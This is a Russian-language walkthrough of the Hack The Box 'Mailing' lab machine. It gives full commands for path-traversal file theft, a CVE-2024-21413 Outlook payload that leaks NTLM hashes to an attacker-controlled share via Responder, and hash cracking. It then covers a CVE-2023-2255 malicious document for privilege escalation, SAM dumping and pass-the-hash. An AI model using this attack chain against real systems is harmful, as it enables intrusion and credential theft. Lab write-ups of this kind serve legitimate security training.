Telegram / Boosty / Видео

Подпишись на канал t.me/kiberdruzhinnik, чтобы не пропускать контент.

Смотри на t.me/kiberdruzhinnik/340.

Также на https://boosty.to/kiberdruzhinnik/posts/b01f9877-40c1-490f-ad92-769b4a7ca08e я опубликовал подробный видео разбор этой задачи. Это может быть полезно для обучения, если вы делаете первые шаги в информационной безопасности. Поддержать меня на Boosty.

Обзор сервисов

Пробуем сканировать порты машины:

Open 10.129.57.210:993
Open 10.129.57.210:587
Open 10.129.57.210:465
Open 10.129.57.210:445
Open 10.129.57.210:143
Open 10.129.57.210:139
Open 10.129.57.210:135
Open 10.129.57.210:110
Open 10.129.57.210:80
Open 10.129.57.210:25
Open 10.129.57.210:5040

Веб

Занесем домен mailing.htb в /etc/hosts.

alt text

Ссылка на скачивание инструкции выглядит так: http://mailing.htb/download.php?file=instructions.pdf и содержит в себе Local File Inclusion.

Попробуем выкачать файл настроек http://mailing.htb/download.php?file=..\..\..\..\..\Program Files (x86)\hMailServer\Bin\hMailServer.ini:

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Из этого файла находим два MD5-хеша, которые пробуем проверить на crackstation.net, один из которых дает нам хеш администратора hMailServer.

Попробуем воспользоваться уязвимостью в Outlook, чтобы украсть NetNTLMv2 хеш пользователя maya (мы узнали об этом пользователе из главной страницы и инструкции):

Раскручиваем Responder:

python3 Responder.py -I tun0

И готовим нагрузку для CVE-2024-21413 Outlook:

git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
cd CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password *** --sender [email protected] --recipient [email protected] --url '\\10.10.14.107\test\exploit' --subject hello

Теперь придется подождать некоторое время, пока maya не посмотрит наше сообщение. В конце концов, мы ловим хеш:

alt text

Копируем его в файл hash.txt и пробуем сбрутить:

hashcat -a 0 -m 5600 hash.txt rockyou.txt

В результате получаем креды, которые мы можем использовать для подключения с помощью evil-winrm:

evil-winrm -i mailing.htb -u maya -p ***

alt text

Флаг пользователя

alt text

Повышение привилегий

Пробуем найти запланированные задачи и находим странную задачу из-под пользователя localadmin:

alt text

Похоже, что мы можем использовать CVE-2023-2255 для повышения привилегий.

Добавим maya в группу администраторов:

git clone https://github.com/elweth-sec/CVE-2023-2255
cd CVE-2023-2255
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

Загрузим документ в C:\Important Documents:

*Evil-WinRM* PS C:\> cd "C:/Important Documents"
*Evil-WinRM* PS C:\Important Documents> upload exploit.odt

Немного подождем и проверим группы пользователя maya:

*Evil-WinRM* PS C:\Important Documents> net user maya
User name                    maya
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2024-04-12 4:16:20 AM
Password expires             Never
Password changeable          2024-04-12 4:16:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2024-05-05 11:56:14 AM

Logon hours allowed          All

Local Group Memberships      *Administradores      *Remote Management Use
                             *Usuarios             *Usuarios de escritori
Global Group memberships     *Ninguno
The command completed successfully.

С помощью crackmapexec дампнем хеши:

podman run -it --rm docker.io/heywoodlh/crackmapexec smb mailing.htb -u maya -p "***" --sam

Теперь с помощью evil-winrm подключимся с помощью Pass-the-Hash:

evil-winrm -i mailing.htb -u localadmin -H "***"

alt text

Флаг суперпользователя

alt text